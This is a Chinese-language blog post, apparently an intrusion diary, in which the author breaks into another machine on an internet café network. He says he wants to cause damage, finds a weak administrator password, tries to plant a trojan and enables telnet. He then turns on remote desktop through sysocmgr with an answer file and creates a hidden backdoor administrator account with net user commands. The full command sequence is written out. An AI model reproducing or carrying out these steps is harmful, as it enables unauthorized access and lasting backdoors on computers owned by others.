从ipc$到开3389

类别:编程语言 点击:0 评论:0 推荐:
今天到这个网吧上网很不爽 所以想搞一下破坏。先看看有什么东西。用流光扫了一下。晕 什么都没有 只有一个弱口令 user:administrator pass:123。
上去看看 本来准备在命令行下建立一个空连接。但我比较懒。就直接用木马种植者。copy木马上去。提示复制成功。但运行失败。郁闷中......还是telnet 23看看吧
运行cnd

Microsoft Windows XP [版本 5.1.2600]
© 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\JS.NET>cd\

C:\>telnet 192.168.1.8
正在连接到192.168.1.8...不能打开到主机的连接, 在端口 23: 连接失败


晕 没开telnet 我就郁闷啊
看来没什么戏了。继续浏览我的网页。看着看着。居然在华夏看到一个软件。只要知道知道管理员用户和密码就可以开启3389,23等端口。呵呵 赶紧下下来看看

填写administrator 填写密码123以后 开3389

然后点开始运行----mstsc 打开远程桌面连接。填写ip192.138.1.8

什么?????无法连接。难道没开3389?我就郁闷啊我!!!!!幸好还有个开telnet的 试一下看可以不可以。点击了一下。出来一串e文。提示成功 还祝我good luck。我就晕 telnet看一下了再说

运行cmd 输入telnet 192.168.1.8 添入user:admin pass:123
成功。呵呵 开他的3389看看

c:\>query user
这个工具需要安装终端服务.
没安装,那我们开始给他安装一下

c:\>dir c:\sysoc.inf /s
c:\winnt\inf 的目录

2004-11-11 21:00 3,770 sysoc.inf
1 个文件 3,770 字节
c:\> dir c:\sysocmgr.* /s
c:\winnt\system32 的目录

2000-11-11 21:03 42,768 sysocmgr.exe
1 个文件 42,768 字节
c:\>echo [components] > c:\wawa
c:\>echo tsenable = on >> c:\wawa
c:\>type c:\wawa
[components]
tsenable = on

c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
本来等待一下主机就可以重启了.但我的却先重启了 真是失败.呵呵.等重新启动以后运行__mstsc 192.168.1.8
呵呵 可以进去了,终于完成了.先不忙着破坏。给自己留一个后门,先建立一个用户:txsky pass:txsky。
cmd下的命令是这样的。telnet上对方以后 依次使用下面的命令:
net user txsky txsky/add
//建立用户
net localgroup administrators txsky /add
//提升权限


建立超级应藏的用户吧。参考文章:http://shop.enet.com.cn/eschool/inforcenter/A20040721326501_2.html

呵呵 安全了 撤退了

本文地址:http://com.8s8s.com/it/it24241.htm